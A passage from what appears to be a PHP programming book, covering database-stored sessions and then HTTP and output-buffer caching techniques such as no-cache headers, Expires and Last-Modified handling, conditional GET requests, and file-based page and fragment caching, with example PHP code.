                                                              DatabaseSession.class.php (excerpt)

      public function __destruct()
      {
        session_write_close();
      }
 }



Using the DatabaseSession Class
Here’s a simple script to test our new DatabaseSession class:

                                                                          dbsession.php (excerpt)

 <?php
 require_once 'DatabaseSession.class.php';

 $session = new DatabaseSession('user', 'secret', 'session',
     'access_control','localhost');
 session_set_save_handler(array($session, 'open'),
     array($session, 'close'),
     array($session, 'read'),
     array($session, 'write'),
     array($session, 'destroy'),
     array($session, 'gc')
 );


 session_start();

 $name = (isset($_SESSION['name']))? $_SESSION['name'] :'';

 if ($name !== '')
 {
     echo 'Welcome ', $name, ' to your session!';
 }
 else
 {
     echo "Let's start the session!";
     $_SESSION['name'] = 'PHP';
 }
 ?>

15 http://dev.mysql.com/doc/refman/5.1/en/optimize-table.html
16 http://www.php.net/session_set_save_handler/




      We include our DatabaseSession class, then instantiate the DatabaseSession object.
      Next, we use session_set_save_handler to register our custom PHP session-handling
      methods. Then we have a quick little demonstration to show us that the session is
      working: the first time you load the web page you should see the message
      “Let’s start the session!” We then set $_SESSION['name'] to PHP. When you refresh
      the web page, the message should change to “Welcome PHP to your session!”,
      which indicates that our session data is being stored in, and retrieved from, the
      database correctly.

      Welcome to database-saved sessions!


      Summary
      In this chapter we’ve investigated HTTP authentication and PHP sessions, and
      created a complete access control system that can manage user registrations,
      password resets and changes, and authorization with groups and multiple permission
      levels.

      Phew! Well, there you have it—total access control over your site! Now you have
      the power to bark “Denied” at those that shouldn’t be in restricted areas, and roll
      out the red carpet for those that should. Can you feel the warm glow of power
      gathering within you? Will you use it for good—or evil? Either way, I hope you’ve
      enjoyed it and learned a bit along the way.
Chapter 11

Caching
In the good old days when building web sites was as easy as knocking up a few
HTML pages, the delivery of a web page to a browser was a simple matter of having
the web server fetch a file. A site’s visitors would see its small, text-only pages almost
immediately, unless they were using particularly slow modems. Once the page was
downloaded, the browser would cache it somewhere on the local computer so that,
should the page be requested again, after performing a quick check with the server
to ensure the page hadn’t been updated, the browser could display the locally cached
version. Pages were served as quickly and efficiently as possible, and everyone was
happy.

Then dynamic web pages came along and spoiled the party by introducing two
problems:

■	 When a request for a dynamic web page is received by the server, some
   intermediate processing must be completed, such as the execution of scripts by the
   PHP engine. This processing introduces a delay before the web server begins to
   deliver the output to the browser. This may not be a significant delay where simple
   PHP scripts are concerned, but for a more complex application, the PHP engine may
   have a lot of work to do before the page is finally ready for delivery. This extra
   work results in a noticeable time lag between the user’s requests and the actual
   display of pages in the browser.

      ■	 A typical web server, such as Apache, uses the time of file modification to inform
         a web browser of a requested page’s age, allowing the browser to take appropriate
         caching action. With dynamic web pages, the actual PHP script may change only
         occasionally; meanwhile, the content it displays, which is often fetched from a
         database, will change frequently. The web server has no way of discerning
         updates to the database, so it doesn’t send a last modified date. If the client (that
         is, the user’s browser) has no indication of how long the data will remain valid,
         it will take a guess. This is problematic if the browser decides to use a locally
         cached version of the page which is now out of date, or if the browser decides
         to request from the server a fresh copy of the page, which actually has no new
         content, making the request redundant. The web server will always respond
         with a freshly constructed version of the page, regardless of whether or not the
         data in the database has actually changed.

         To avoid the possibility of a web site visitor viewing out-of-date content, most
         web developers use a meta tag or HTTP headers to tell the browser never to use
         a cached version of the page. However, this negates the web browser’s natural
         ability to cache web pages, and entails some serious disadvantages. For example,
         the content delivered by a dynamic page may only change once a day, so there’s
         certainly a benefit to be gained by having the browser cache a page—even if only
         for 24 hours.

      If you’re working with a small PHP application, it’s usually possible to live with
      both issues. But as your site increases in complexity—and attracts more
      traffic—you’ll begin to run into performance problems. Both these issues can be
      solved, however: the first with server-side caching; the second, by taking control
      of client-side caching from within your application. The exact approach you use to
      solve these problems will depend on your application, but in this chapter, we’ll
      consider both PHP and a number of class libraries from PEAR as possible panaceas
      for your web page woes.

      Note that in this chapter’s discussions of caching, we’ll look at only those solutions
      that can be implemented in PHP. For a more general introduction, the definitive
      discussion of web caching is Mark Nottingham’s tutorial.1 Furthermore, the solutions
      in this chapter should not be confused with script caching solutions that optimize
      and cache compiled PHP scripts, such as Zend Accelerator2 and ionCube PHP
      Accelerator.3


How do I prevent web browsers from caching a page?

If timely information is crucial to your web site and you wish to prevent out-of-date
content from ever being visible, you need to understand how to prevent web
browsers—and proxy servers—from caching pages in the first place.

Solutions
There are two possible approaches we could take to solving this problem: using
HTML meta tags, and using HTTP headers.

Using HTML Meta Tags
The most basic approach to the prevention of page caching is one that utilizes HTML
meta tags:

    <meta http-equiv="expires" content="Mon, 26 Jul 1997 05:00:00 GMT"/>
    <meta http-equiv="pragma" content="no-cache" />



The insertion of a date that’s already passed into the Expires meta tag tells the
browser that the cached copy of the page is always out of date. Upon encountering
this tag, the browser usually won’t cache the page. Although the Pragma: no-cache
meta tag isn’t guaranteed, it’s a fairly well-supported convention that most web
browsers follow. However, the two issues associated with this approach, which
we’ll discuss below, may prompt you to look at the alternative solution.

Using HTTP Headers
A better approach is to use the HTTP protocol itself, with the help of PHP’s header
function, to produce the equivalent of the two HTML meta tags above:

    <?php
      header('Expires: Mon, 26 Jul 1997 05:00:00 GMT');
      header('Pragma: no-cache');
    ?>

1 http://www.mnot.net/cache_docs/
2 http://www.zend.com/
3 http://www.php-accelerator.co.uk/



      We can go one step further than this, using the Cache-Control header that’s
      supported by HTTP 1.1-capable browsers:

          <?php
            header('Expires: Mon, 26 Jul 1997 05:00:00 GMT');
            header('Cache-Control: no-store, no-cache, must-revalidate');
            // false = add a second Cache-Control header instead of
            // replacing the one set on the previous line
            header('Cache-Control: post-check=0, pre-check=0', false);
            header('Pragma: no-cache');
          ?>



      For a precise description of HTTP 1.1 Cache-Control headers, have a look at the
      HTTP 1.1 specification, RFC 2616, on the W3C’s web site.4 Another great source of
      information about HTTP headers, which can be applied readily to PHP, is mod_perl’s
      documentation on issuing correct headers.5
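
If several scripts need the same headers, they can be collected in one place. The following is a sketch only: noCacheHeaders and sendNoCacheHeaders are hypothetical helper names, and the header values are the ones used in the examples above (the Internet Explorer-specific post-check and pre-check directives are left out for brevity).

```php
<?php
// Hypothetical helper: returns the header lines used in this solution
// so that they can be inspected or reused.
function noCacheHeaders()
{
    return array(
        'Expires: Mon, 26 Jul 1997 05:00:00 GMT',
        'Cache-Control: no-store, no-cache, must-revalidate',
        'Pragma: no-cache',
    );
}

// Hypothetical helper: sends the headers, or returns false if it is
// already too late to do so.
function sendNoCacheHeaders()
{
    // headers_sent() guards against the warning PHP raises when
    // output has already started.
    if (headers_sent()) {
        return false;
    }
    foreach (noCacheHeaders() as $line) {
        header($line);
    }
    return true;
}
```

A script would call sendNoCacheHeaders() before producing any output, because HTTP headers can’t be changed once the response body has begun.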

      Discussion
      Using the Expires meta tag sounds like a good approach, but two problems are
      associated with it:

      ■	 The browser first has to download the page in order to read the meta tags. If a
         tag wasn’t present when the page was first requested by a browser, the browser
         will remain blissfully ignorant and keep its cached copy of the original.

      ■	 Proxy servers that cache web pages, such as those common to ISPs, generally
         won’t read the HTML documents themselves. A web browser might know that
         it shouldn’t cache the page, but the proxy server between the browser and the
         web server probably doesn’t—it will continue to deliver the same out-of-date
         page to the client.

      On the other hand, using HTTP headers to prevent page caching essentially
      guarantees that no web browser or intervening proxy server will cache the page, so
      visitors will always receive the latest content. In fact, the first header should
      accomplish this on its own; this is the best way to ensure a page is not cached. The
      Cache-Control and Pragma headers are added for some degree of insurance. Although
      they don’t work on all browsers or proxies, the Cache-Control and Pragma headers
      will catch some cases in which the Expires header doesn’t work as intended, for
      example when the client computer’s date is set incorrectly.

      4 http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9
      5 http://perl.apache.org/docs/general/correct_headers/correct_headers.html

Of course, to disallow caching entirely introduces the problems we discussed at
the start of this chapter: it negates the web browser’s natural ability to cache pages,
and can create unnecessary overhead, as new versions of pages are always requested,
even though those pages may not have been updated since the browser’s last request.
We’ll look at the solution to these issues in just a moment.


How do I control client-side caching?
We addressed the task of disabling client-side caching in “How do I prevent web
browsers from caching a page?”, but disabling the cache is rarely the only (or best)
option.

Here we’ll look at a mechanism that allows us to take advantage of client-side caches
in a way that can be controlled from within a PHP script.


       Apache Required!
      This approach will only work if you’re running PHP as an Apache web server
      module, because it requires use of the function getallheaders—which only
      works with Apache—to fetch the HTTP headers sent by a web browser.


Solutions
In controlling client-side caching you have two alternatives. You can set a date on
which the page will expire, or respond to the browser’s request headers. Let’s see
how each of these tactics is executed.

Setting a Page Expiry Header
The header that’s easiest to implement is the Expires header—we use it to set a
date on which the page will expire, and until that time, web browsers are allowed
to use a cached version of the page. Here’s an example of this header at work:

                                                                       expires.php (excerpt)

       <?php
       // Send an Expires header set $expires seconds into the future.
       function setExpires($expires) {
         header(
             'Expires: '.gmdate('D, d M Y H:i:s', time()+$expires).' GMT');
       }
       setExpires(10);
       echo ( 'This page will self destruct in 10 seconds<br />' );
       echo ( 'The GMT is now '.gmdate('H:i:s').'<br />' );
       echo ( '<a href="'.$_SERVER['PHP_SELF'].'">View Again</a><br />' );
       ?>



      In this example, we created a custom function called setExpires that sets the HTTP
      Expires header to a point in the future, defined in seconds. The output of the above
      example shows the current time in GMT, and provides a link that allows us to view
      the page again. If we follow this link, we’ll notice the time updates only once every
      ten seconds. If you like, you can also experiment by using your browser’s Refresh
      button to tell the browser to refresh the cache, and watching what happens to the
      displayed date.
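
      HTTP 1.1 clients also understand the Cache-Control: max-age directive, which
      states the same lifetime as a number of seconds rather than as a date. Here is a
      minimal sketch that builds both headers together; the function name expiryHeaders
      is hypothetical, and the optional $now parameter exists only so that the result
      can be checked against a known time.

```php
<?php
// Hypothetical helper: builds an Expires header plus the equivalent
// Cache-Control: max-age header for a lifetime given in seconds.
function expiryHeaders($seconds, $now = null)
{
    if ($now === null) {
        $now = time(); // default to the current time
    }
    return array(
        'Expires: ' . gmdate('D, d M Y H:i:s', $now + $seconds) . ' GMT',
        'Cache-Control: max-age=' . (int) $seconds,
    );
}
```

      Each returned line can be passed to header() before any output is sent, in the
      same way that setExpires sends its single header.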

      Acting on the Browser’s Request Headers
      A more useful approach to client-side cache control is to make use of the Last-
      Modified and If-Modified-Since headers, both of which are available in HTTP
      1.0. This action is known technically as performing a conditional GET request;
      whether your script returns any content depends on the value of the incoming If-
      Modified-Since request header.

      If you use PHP version 4.3.0 and above on Apache, the HTTP headers are accessible
      with the functions apache_request_headers and apache_response_headers. Note
      that the function getallheaders has become an alias for the new
      apache_request_headers function.

      This approach requires that you send a Last-Modified header every time your PHP
      script is accessed. The next time the browser requests the page, it sends an If-
      Modified-Since header containing a time; your script can then identify whether
      the page has been updated since that time. If it hasn’t, your script sends an HTTP
      304 status code to indicate that the page hasn’t been modified, and exits before
      sending the body of the page.

Let’s see these headers in action. The example below uses the modification date of
a text file. To simulate updates, we first need to create a way to randomly write to
the file:

                                                               ifmodified.php (excerpt)

 <?php
 $file = 'ifmodified.txt';
 $random = array (0,1,1);
 shuffle($random);
 if ( $random[0] == 0 ) {
   $fp = fopen($file, 'w');
   fwrite($fp, 'x');
   fclose($fp);
 }
 $lastModified = filemtime($file);



Our simple randomizer provides a one-in-three chance that the file will be updated
each time the page is requested. We also use the filemtime function to obtain the
last modified time of the file.

Next, we send a Last-Modified header that uses the modification time of the text
file. We need to send this header for every page we render, to cause visiting browsers
to send us the If-Modified-Since header upon every request:

                                                               ifmodified.php (excerpt)

 header('Last-Modified: ' .
     gmdate('D, d M Y H:i:s', $lastModified) . ' GMT');



Our use of the getallheaders function ensures that PHP gives us all the incoming
request headers as an array. We then need to check that the If-Modified-Since
header actually exists; if it does, we have to deal with a special case caused by older
Mozilla browsers (earlier than version 6), which appended an illegal extra field to
their If-Modified-Since headers. We use PHP’s strtotime function to generate a
timestamp from the date the browser sent us. If there’s no such header, we set this
timestamp to zero, which forces PHP to give the visitor an up-to-date copy of the
page:

                                                                   ifmodified.php (excerpt)

       $request = getallheaders();
       if (isset($request['If-Modified-Since']))
       {
         $modifiedSince = explode(';', $request['If-Modified-Since']);
         $modifiedSince = strtotime($modifiedSince[0]);
       }
       else
       {
         $modifiedSince = 0;
       }
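
      Where getallheaders isn’t available, the same value can usually be read from the
      $_SERVER array, in which PHP exposes the If-Modified-Since request header under
      the key HTTP_IF_MODIFIED_SINCE. The sketch below assumes that behavior; the
      function name ifModifiedSinceTimestamp is hypothetical, and the array is passed
      in as an argument so that the function is easy to try out.

```php
<?php
// Hypothetical helper: extracts the If-Modified-Since time as a Unix
// timestamp from a $_SERVER-style array, or returns 0 if it is absent.
function ifModifiedSinceTimestamp(array $server)
{
    if (empty($server['HTTP_IF_MODIFIED_SINCE'])) {
        return 0; // no header: treat the page as modified
    }
    // Discard anything after a semicolon (an extra field such as "; length=1234")
    $parts = explode(';', $server['HTTP_IF_MODIFIED_SINCE']);
    $timestamp = strtotime(trim($parts[0]));
    return ($timestamp === false) ? 0 : $timestamp;
}
```

      In a real script the call would be ifModifiedSinceTimestamp($_SERVER), and the
      result would take the place of $modifiedSince in the example above.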



      Finally, we check to see whether the file has been modified since the last
      time the visitor received this page. If it hasn’t, we simply send a 304 Not Modified
      response header and exit the script, saving bandwidth and processing time by
      prompting the browser to display its cached copy of the page:

                                                                   ifmodified.php (excerpt)

       if ($lastModified <= $modifiedSince)
       {
         header('HTTP/1.1 304 Not Modified');
         exit();
       }

       echo ( 'The GMT is now '.gmdate('H:i:s').'<br />' );
       echo ( '<a href="'.$_SERVER['PHP_SELF'].'">View Again</a><br />' );
       ?>



      Remember to use the “View Again” link when you run this example (clicking the
      Refresh button usually makes the browser bypass its cache). If you click on the
      link repeatedly, the file will eventually be updated; your browser will throw out
      its cached version and fetch a new page from the server.

      If you combine the Last-Modified header approach with time values that are already
      available in your application (for example, the time of the most recent news
      article), you should be able to take advantage of web browser caches, saving
      bandwidth and improving your application’s perceived performance in the process.

Be very careful to test any caching performed in this manner, though; if you get it
wrong, you may cause your visitors to consistently see out-of-date copies of your
site.
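
One way to make this logic easier to test is to separate the decision from the code
that sends headers. The following sketch assumes that your application can supply the
modification times of the items shown on a page as Unix timestamps; the function names
pageLastModified and isNotModified are hypothetical.

```php
<?php
// Hypothetical helper: the page is as new as the newest item it displays.
// With no items to go on, fall back to the current time (never cached).
function pageLastModified(array $itemTimestamps)
{
    return empty($itemTimestamps) ? time() : max($itemTimestamps);
}

// Hypothetical helper: true when the browser's copy is still current and
// a 304 Not Modified response would be appropriate.
function isNotModified($lastModified, $modifiedSince)
{
    return $modifiedSince > 0 && $lastModified <= $modifiedSince;
}
```

A script would send the Last-Modified header built from pageLastModified, then send
the 304 status and exit only when isNotModified returns true.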

Discussion
HTTP dates are always expressed in Greenwich Mean Time (GMT). The PHP function
gmdate is exactly the same as the date function, except that it formats the time in
GMT rather than in the time zone PHP is configured to use.
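
The difference is easy to see by formatting the same timestamp with both functions.
In this small sketch, the New York time zone is purely an assumption made for the
demonstration; any zone other than GMT would show the same effect.

```php
<?php
// Assumption for the demonstration: PHP is configured for New York time.
date_default_timezone_set('America/New_York');

$timestamp = 0; // the Unix epoch: 1 January 1970, 00:00:00 GMT

$local = date('D, d M Y H:i:s', $timestamp);   // formatted in the configured zone
$gmt   = gmdate('D, d M Y H:i:s', $timestamp); // always formatted in GMT
```

Here $gmt holds the midnight GMT time that an HTTP header needs, while $local holds
the same instant shifted to the configured zone, which would be wrong in a header.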

When a browser encounters an Expires header, it caches the page. All further
requests for the page that are made before the specified expiry time use the cached
version of the page, and no request is sent to the web server. Of course, client-side
caching is only truly effective if the system time on the computer is accurate. If the
computer’s time is out of sync with that of the web server, you run the risk of pages
either being cached improperly, or never being updated.

The Expires header has the advantage that it’s easy to implement; in most cases,
however, unless you’re a highly organized person, you won’t know exactly when
a given page on your site will be updated. Since the browser will only contact the
server after the page has expired, there’s no way to tell browsers that the page they’ve
cached is out of date. In addition, you also lose some knowledge of the traffic visiting
your web site, since the browser will not make contact with the server when it
requests a page that’s been cached.


How do I examine HTTP
headers in my browser?
How can you actually check that your application is running as expected, or debug
your code, if you can’t actually see the HTTP headers? It’s worth knowing exactly
which headers your script is sending, particularly when you’re dealing with HTTP
cache headers.

Solution
Several worthy tools are available to help you get a closer look at your HTTP
headers:

      LiveHTTPHeaders (http://livehttpheaders.mozdev.org/)
          This add-on to the Firefox browser is a simple but very handy tool for examining
          request and response headers while you’re browsing.

      Firebug (http://getfirebug.org/)
          Another useful Firefox add-on, Firebug is a tool whose interface offers a
          dedicated tab for examining HTTP request information.

      HTTPWatch (http://www.httpwatch.com/)
          This add-on to Internet Explorer for HTTP viewing and debugging is similar to
          LiveHTTPHeaders above.

      Charles Web Debugging Proxy (http://getcharles.com/)
          Available for Windows, Mac OS X, and Linux or Unix, the Charles Web
          Debugging Proxy is a proxy server that allows developers to see all the HTTP
          traffic between their browsers and the web servers to which they connect.

      Any of these tools will allow you to inspect the communication between the server
      and browser.
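
      For a quick check from inside a script, PHP 5 and later also provide the
      headers_list function, which returns the response headers the script has set so
      far. The sketch below is only an illustration: the function name
      describeResponseHeaders is hypothetical, and the result covers only headers set
      through PHP, not anything added later by the web server or a proxy.

```php
<?php
// Hypothetical helper: summarizes the response headers PHP has queued so far
// as a single line of text, suitable for writing to a log while debugging.
function describeResponseHeaders($label)
{
    $headers = headers_list(); // e.g. array('Expires: ...', 'Pragma: no-cache')
    return $label . ': ' . implode(' | ', $headers);
}
```

      The returned string could be passed to error_log while debugging, which keeps
      the information out of the page itself.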


      How do I cache file downloads
      with Internet Explorer?
      If you’re developing file download scripts for Internet Explorer users, you might
      notice a few issues with the download process. In particular, when you’re serving
      a file download through a PHP script that uses headers such as
      Content-Disposition: attachment; filename=myFile.pdf or
      Content-Disposition: inline; filename=myFile.pdf, and that tells the browser not
      to cache pages, Internet Explorer won’t deliver that file to the user.

      Solutions
      Internet Explorer handles downloads in a rather unusual manner: it makes two
      requests to the web site. The first request downloads the file and stores it in the
      cache before making a second request, the response to which is not stored. The
      second request invokes the process of delivering the file to the end user in
      accordance with the file’s type; for instance, it starts Acrobat Reader if the file
      is a PDF document. Therefore, if you send the cache headers that instruct the
      browser not to cache the page, Internet Explorer will delete the file between the
      first and second requests, with the unfortunate result that the end user receives
      nothing!

If the file you’re serving through the PHP script won’t change, one solution to this
problem is simply to disable the “don’t cache” headers, Pragma and Cache-Control,
which we discussed in “How do I prevent web browsers from caching a page?”, for
the download script.

If the file download will change regularly, and you want the browser to download
an up-to-date version of it, you’ll need to use the Last-Modified header that we
met in “How do I control client-side caching?”, and ensure that the time of
modification remains the same across the two consecutive requests. You should be able to
achieve this goal without affecting users of browsers that handle downloads correctly.
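
A simple way to keep the modification time stable across both requests is to take it
from the file itself rather than from the current time. Here is a minimal sketch of
that idea; the function name downloadHeaders is hypothetical, and the generic
application/octet-stream content type is an assumption that you would replace with
the real type of your file.

```php
<?php
// Hypothetical helper: builds the headers for a file download. Last-Modified
// comes from the file's own modification time, so two consecutive requests
// for an unchanged file receive an identical value.
function downloadHeaders($path, $downloadName)
{
    clearstatcache(); // make sure filesize and filemtime are up to date
    return array(
        'Content-Type: application/octet-stream',
        'Content-Disposition: attachment; filename="'
            . basename($downloadName) . '"',
        'Content-Length: ' . filesize($path),
        'Last-Modified: ' . gmdate('D, d M Y H:i:s', filemtime($path)) . ' GMT',
    );
}
```

The download script would pass each line to header() and then send the file's
contents, for example with readfile.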

One final solution is to write the file to the file system of your web server and simply
provide a link to it, leaving it to the web server to report the cache headers for you.
Of course, this may not be a viable option if the file is supposed to be secured.


How do I use output buffering
for server-side caching?
Server-side processing delay is one of the biggest bugbears of dynamic web pages.
We can reduce server-side delay by caching output. The page is generated normally,
performing database queries and so on with PHP; however, before sending it to the
browser, we capture and store the finished page somewhere—in a file, for instance.
The next time the page is requested, the PHP script first checks to see whether a
cached version of the page exists. If it does, the script sends the cached version
straight to the browser, avoiding the delay involved in rebuilding the page.

Solution
Here, we’ll look at PHP’s in-built caching mechanism, the output buffer, which can
be used with whatever page rendering system you prefer (templates or no templates).
Consider situations in which your script displays results using, for example, echo
or print, rather than sending the data directly to the browser. In such cases, you
can use PHP’s output control functions to store the data in an in-memory buffer,
which your PHP script has both access to and control over.

      Here’s a simple example that demonstrates how the output buffer works:

                                                                         buffer.php (excerpt)

       <?php
       ob_start();
       echo '1. Place this in the buffer<br />';
       $buffer = ob_get_contents();
       ob_end_clean();
       echo '2. A normal echo<br />';
       echo $buffer;
       ?>



      The buffer itself stores the output as a string. So, in the above script, we commence
      buffering with the ob_start function, and use echo to display a piece of text which
      is stored in the output buffer automatically. We then use the ob_get_contents
      function to fetch the data the echo statement placed in the buffer, and store it in
      the $buffer variable. The ob_end_clean function stops the output buffer and
      empties the contents; the alternative approach is to use the ob_end_flush function,
      which displays the contents of the buffer.

      The above script displays the following output:

       2. A normal echo

       1. Place this in the buffer



      In other words, we captured the output of the first echo, then sent it to the browser
      after the second echo. As this simple example suggests, output buffering can be a
      very powerful tool when it comes to building your site; it provides a solution for
      caching, as we’ll see in a moment, and is also an excellent way to hide errors from
      your site’s visitors, as is discussed in Chapter 9. Output buffering even provides a
      possible alternative to browser redirection in situations such as user authentication.
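
      The ob_get_contents and ob_end_clean pair used above can be shortened with
      ob_get_clean, which returns the buffer contents and ends buffering in one call.
      The following sketch wraps the pattern in a helper; the names captureOutput and
      greet are hypothetical and exist only for this illustration.

```php
<?php
// Hypothetical helper: runs a callback and returns whatever it echoed,
// instead of letting that output reach the browser.
function captureOutput($callback)
{
    ob_start();
    call_user_func($callback);
    return ob_get_clean(); // fetch the buffer contents and stop buffering
}

// An ordinary function that echoes its result.
function greet()
{
    echo 'Hello from the buffer';
}

$captured = captureOutput('greet'); // nothing has been displayed yet
```

      After this runs, $captured holds the text that greet tried to display, and the
      script is free to store it, modify it, or echo it later.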

      In order to improve the performance of our site, we can store the output buffer
      contents in a file. We can then call on this file for the next request, rather than
      having to rebuild the output from scratch again. Let’s look at a quick example of
      this technique. First, our example script checks for the presence of a cache file:

                                                                   sscache.php (excerpt)

 <?php
 if (file_exists('./cache/page.cache'))
 {
   readfile('./cache/page.cache');
   exit();
 }



If the script finds the cache file, we simply output its contents and we’re done!


If the cache file is not found, we proceed to output the page using the output buffer:


                                                                   sscache.php (excerpt)

 ob_start();
 ?>
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
     <title>Cached Page</title>
   </head>
   <body>
     This page was cached with PHP's
     <a href="http://www.php.net/outcontrol"
         >Output Control Functions</a>
   </body>
 </html>
 <?php
 $buffer = ob_get_contents();
 ob_end_flush();



Before we flush the output buffer to display our page, we make sure to store the
buffer contents in the $buffer variable.

The final step is to store the saved buffer contents in a text file:

                                                                      sscache.php (excerpt)

          $fp = fopen('./cache/page.cache','w');
          fwrite($fp,$buffer);
          fclose($fp);
          ?>



      The page.cache file contents are exactly the same as the HTML that was rendered
      by the script:

                                                                 cache/page.cache (excerpt)

          <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
            "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
          <html xmlns="http://www.w3.org/1999/xhtml">
            <head>
              <title>Cached Page</title>
            </head>
            <body>
              This page was cached with PHP's
              <a href="http://www.php.net/outcontrol"
                  >Output Control Functions</a>
            </body>
          </html>



      Discussion
      For an example that shows how to use PHP’s output buffering capabilities to handle
      errors more elegantly, have a look at the PHP Freaks article “Introduction to Output
      Buffering,” by Derek Ford.6
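
      Note that the sscache.php example never refreshes page.cache once the file
      exists. One possible refinement is to give the cache a lifetime, as in the
      sketch below. The function name cachedPage and its parameters are hypothetical;
      the page is produced by a callback so that it’s only rendered when the cache is
      missing or too old.

```php
<?php
// Hypothetical helper: returns the cached page if it is younger than
// $lifetime seconds; otherwise renders the page, caches it, and returns it.
function cachedPage($cacheFile, $lifetime, $render)
{
    clearstatcache(); // avoid stale file information
    if (file_exists($cacheFile)
        && (time() - filemtime($cacheFile)) <= $lifetime) {
        return file_get_contents($cacheFile); // the cache is still fresh
    }
    ob_start();
    call_user_func($render);                       // the callback echoes the page
    $page = ob_get_clean();
    file_put_contents($cacheFile, $page, LOCK_EX); // lock the file while writing
    return $page;
}
```

      A script would echo the value returned by cachedPage, passing a callback that
      builds the page in the usual way.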

      What About Template Caching?
      Template engines often include template caching features—Smarty is a case in
      point.7 Usually, these engines offer a built-in mechanism for storing a compiled
      version of a template (that is, the native PHP generated from the template), which
      prevents us developers from having to recompile the template every time a page is
      requested.


      6
          http://www.phpfreaks.com/tutorials/59/0.php
      7
          http://smarty.php.net/

This process should not be confused with output—or content—caching, which
refers to the caching of the rendered HTML (or other output) that PHP sends to the
browser. In addition to the content cache mechanisms discussed in this chapter,
Smarty can cache the contents of the HTML page. Whether you use Smarty’s content
cache or one of the alternatives discussed in this chapter, you can successfully use
both template and content caching together on the same site.

HTTP Headers and Output Buffering
Output buffering can help solve the most common problem associated with the
header function, not to mention the issues surrounding session_start and
setcookie. Normally, if you call any of these functions after page output has begun,
you’ll get a nasty error message. When output buffering’s turned on, the only output
types that can escape the buffer are HTTP headers. If you use ob_start at the very
beginning of your application’s execution, you can send headers at whichever point
you like, without encountering the usual errors. You can then write out the buffered
page content all at once, when you’re sure that no more HTTP headers are required.
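
To illustrate, here is a minimal sketch in which a header is set after content has
already been echoed. The X-Example header is made up for the purposes of the
demonstration, and the script assumes that nothing has been output before ob_start
is called.

```php
<?php
ob_start();                       // start buffering before any output

echo '<p>Some page content</p>';  // held in the buffer, not sent yet

// Because the echo above went into the buffer, headers can still be sent.
$canStillSendHeaders = !headers_sent();
if ($canStillSendHeaders) {
    header('X-Example: sent-after-echo'); // hypothetical header
}

$page = ob_get_clean();           // take the content out of the buffer
```

Once all the headers have been set, echoing $page writes the whole page out in one
go.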


       Use Output Buffering Responsibly
      While output buffering can helpfully solve all our header problems, it should
      not be used solely for that reason. By ensuring that all output is generated after
      all the headers are sent, you’ll save the time and resource overheads involved in
      using output buffers.



How do I cache just the parts of
a page that change infrequently?
Caching an entire page is a simplistic approach to output buffering. While it’s easy
to implement, that approach negates the real benefits presented by PHP’s output
control functions to improve your site’s performance in a manner that’s relevant to
the varying lifetimes of your content.

No doubt, some parts of the page that you send to visitors will change very rarely,
such as the page’s header, menus, and footer. But other parts—for example, the list
of comments on your blog posts—may change quite often. Fortunately, PHP allows
you to cache sections of the page separately.


      Solution
      Output buffering can be used to cache sections of a page in separate files. The page
      can then be rebuilt for output from these files.

      This technique eliminates the need to repeat database queries, while loops, and so
      on. You might consider assigning each block of the page an expiry date after which
      the cache file is recreated; alternatively, you may build into your application a
      mechanism that deletes the cache file every time the content it stores is changed.

      Let’s work through an example that demonstrates the principle. Firstly, we’ll create
      two helper functions, writeCache and readCache. Here’s the writeCache function:

                                                                     smartcache.php (excerpt)

       <?php
         function writeCache($content, $filename)
         {
           $fp = fopen('./cache/' . $filename, 'w');
           fwrite($fp, $content);
           fclose($fp);
         }



      The writeCache function is quite simple; it just writes the content of the first
      argument to a file with the name specified in the second argument, and saves that file
      to a location in the cache directory. We’ll use this function to write our HTML to
      the cache files.

      The readCache function will return the contents of the cache file specified in the
      first argument if it has not expired—that is, the file’s last modified time is not older
      than the current time minus the number of seconds specified in the second argument.
      If it has expired or the file does not exist, the function returns false:

                                                                     smartcache.php (excerpt)

         function readCache($filename, $expiry)
         {
           if (file_exists('./cache/' . $filename))
           {
             // The cache has expired if the file is more than $expiry seconds old
             if ((time() - $expiry) > filemtime('./cache/' . $filename))
             {
               return false;
             }
             $cache = file('./cache/' . $filename);
             return implode('', $cache);
           }
           return false;
         }




For the purposes of demonstrating this concept, I’ve used a procedural approach.
However, I wouldn’t recommend doing this in practice, as it will result in very
messy code and is likely to cause issues with file locking. For example, what happens
when someone accesses the cache at the exact moment it’s being updated? Better
solutions will be explained later on in the chapter.
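
In the meantime, one common way to reduce the risk of a visitor reading a
half-written cache file is to write the content to a temporary file and then rename
it into place. The sketch below assumes that the temporary file and the cache file
live on the same file system, where a rename is typically atomic on Unix-like
systems; the function name writeCacheAtomically is hypothetical.

```php
<?php
// Hypothetical helper: writes $content to a temporary file in the cache
// directory, then renames it over $path so readers see either the old
// file or the complete new one.
function writeCacheAtomically($content, $path)
{
    $tmp = tempnam(dirname($path), 'tmp'); // temporary file beside the target
    if ($tmp === false) {
        return false;
    }
    if (file_put_contents($tmp, $content) === false) {
        unlink($tmp); // clean up after a failed write
        return false;
    }
    return rename($tmp, $path);
}
```

Bear in mind that tempnam creates the file with restrictive permissions, which may
need adjusting if other users or processes must read the cache.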

Let’s continue this example. After the output buffer is started, processing begins.
First, the script calls readCache to see whether the file header.cache exists; this
contains the top of the page—the HTML <head> tag and the start <body> tag. We’ve
used PHP’s date function to display the time at which the page was actually
rendered, so you’ll be able to see the different cache files at work when the page is
displayed:

                                                             smartcache.php (excerpt)

   ob_start();
   if (!$header = readCache('header.cache', 604800))
   {
 ?>
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
     <title>Chunked Cached Page</title>
     <meta http-equiv="Content-Type"
         content="text/html; charset=iso-8859-1"/>
   </head>
   <body>
     <p>The header time is now: <?php echo date('H:i:s'); ?></p>
 <?php
     $header = ob_get_contents();
     ob_clean();
     writeCache($header,'header.cache');
   }




      Note what happens when a cache file isn’t found: the header content is output and
      assigned to a variable, $header, with ob_get_contents, after which the ob_clean
      function is called to empty the buffer. This allows us to capture the output in
      “chunks” and assign them to individual cache files with the writeCache function.
      The header of the page is now stored as a file, which can be reused without our
      needing to rerender the page. Look back to the start of the if condition for a moment.
